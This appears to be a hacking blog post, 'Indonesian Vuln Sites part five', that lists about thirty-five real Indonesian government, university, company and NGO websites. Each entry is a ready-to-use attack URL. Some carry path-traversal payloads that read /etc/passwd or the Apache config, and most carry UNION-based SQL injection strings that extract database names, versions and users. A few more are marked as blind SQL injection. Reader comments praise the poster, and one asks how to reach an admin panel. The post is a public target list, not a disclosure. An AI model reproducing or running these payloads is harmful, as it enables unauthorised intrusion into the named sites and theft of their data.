LFI to RCE via access_log injection

Indonesian Vuln Sites [ part five ]

http://www.dikmenum.go.id/dataapp/datapokok/index.php?module=../../../../../../../../../../../../../../../etc/passwd

http://www.kontras.org/index.php?hal=siaran_pers&id=1058+and+1=2+union+all+select+1,database(),3,4,version(),6,7--

http://www.logos-institute.com/index.php?menu=pagealumni&idangkatan=1+and+1=2+union+all+select+database(),version()--

http://fkk.umj.ac.id/index.php?module=../../../../../../../../../../../../../../../etc/passwd

http://se.unikom.ac.id/artikel.php?id=3+and+1=2+union+all+select+1,database(),user(),version(),5--&tipe=detail

http://lisaanashidqin.or.id/index.php?nid=19+AND+1=2+UNION+ALL+SELECT+1,version(),3,4,5,6,7--

http://www.slickbar.co.id/index.php?page=../../../../../../../../../../../../../../../etc/passwd

http://www.beraucoal.co.id/newsdetail.php?idNews=16+AND+1=2+UNION+SELECT+1,2,version(),4,database(),user(),7--

http://www.vision.co.id/vision/detail_career.php?id=16+and+1=2+union+all+select+1,version(),3,user(),database()--

http://www.stiki.ac.id/index.php?modules=../../../../../../../../../../../../../../../etc/passwd

http://pusdiklat.pnri.go.id/detail.php?ID=165+AND+1=2+UNION+ALL+SELECT+1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

http://interior.fs.uns.ac.id/config/artikel.php?id=9+AND+1=2+UNION+ALL+SELECT+1,2,3,version()--

http://www.dmcindonesia.web.id/?lang=../../../../../../../../../../../../../../../etc/passwd

http://www.smkpgrimojoagung.sch.id/artikel.php?id=4+AND+1=2+UNION+ALL+SELECT+1,version(),database(),4,5--

http://www.bc-club.co.id/artikel.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),database(),4,user()--

http://pustaka.ut.ac.id/puslata/index.php?menu=../../../../../../../../../../../../../../../etc/passwd

http://iib.diknas.go.id/info.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),user(),4,database(),6,7--

http://www.astragraphia.co.id/EN/newsroom/newsdetail.php?id=195+and+1=2+union+select+database(),version(),3--&ntype=5

http://insentif.ristek.go.id/download.php?file=../../../../../../../../../../../../../../../etc/passwd

http://dymarjaya.co.id/newsdetail.php?id=10+AND+1=2+UNION+ALL+SELECT+1,2,version()--

http://www.dataglobal.co.id/newsdetail.php?id=70+AND+1=2+UNION+ALL+SELECT+1,2,3,version(),5,database(),7,user()--

http://dwp.kbri-islamabad.go.id/main.php?page=../../../../../../../../../../../../../../../etc/passwd

http://www.earthhour.wwf.or.id/news_detail.php?id=155+AND+1=2+UNION+ALL+SELECT+1,version(),3,4,database()--

http://digilib.biologi.lipi.go.id/indexdisc.php?topic_id=29+AND+1=2+UNION+ALL+SELECT+1,2,3,4,version(),6,7,8,9,database(),user()--

http://www.lpmpjabar.go.id/otomilib/index.php?menu=../../../../../../../../../../../../../../../etc/passwd

http://www.acbi.co.id/articledetail.php?cat=&id=17+and+1=2+union+select+1,version(),database(),user(),5,6--

http://www.otorita-asahan.go.id/berita.php?id=56+AND+1=2+UNION+ALL+SELECT+version(),database(),3,4--

http://web.ptpn7.com/?lang=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf

http://www.kpbptpn.co.id/news.php?news_id=4720+AND+1=2+UNION+ALL+SELECT+1,2,version(),user(),database(),6,7,8,9,10,11,12,13--

http://lemlit.uny.ac.id/sipen/main/index.php?pageID=2&kode_proposal=3122+and+1=2+union+select+1,2,version(),database(),5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--

http://rehab.ditptksd.go.id/index.php?module=../../../../../../../../../../../../../../../etc/passwd

http://aslimotorgroup.co.id/berita-selengkapnya.php?id=31+AND+1=2+UNION+SELECT+1,version(),3,database(),user(),6--


blind sqli

http://www.dk.co.id/new/index.php?id=11+and+1=2+union+all+select+1,2,3--&page=Reseller%20Hosting

http://www.impulse.or.id/artikel.php?id=6

http://www.samudra.co.id/new/detail.php?det=34


Comments

Anonymous said…
thanks very much noga and i hope to make some videos about how to be agood hacker and thnxs again --(THE M@STER 0F ALL)--
evilc0de said…
thx for visiting my blog too brotha.. ^^
video how to be a good hacker? lol
im not a hacker brotha..
Unknown said…
Man u are great :) I ever visit your blog ;)
evilc0de said…
thx for visiting brotha... :))
labatterie said…
You hope to make some videos about how to be agood hacker and thnxs again...
Thank you for sharing with us. The content is very good and helpful for me, I learn and know more about it.
Anonymous said…
how to go to admin login panel?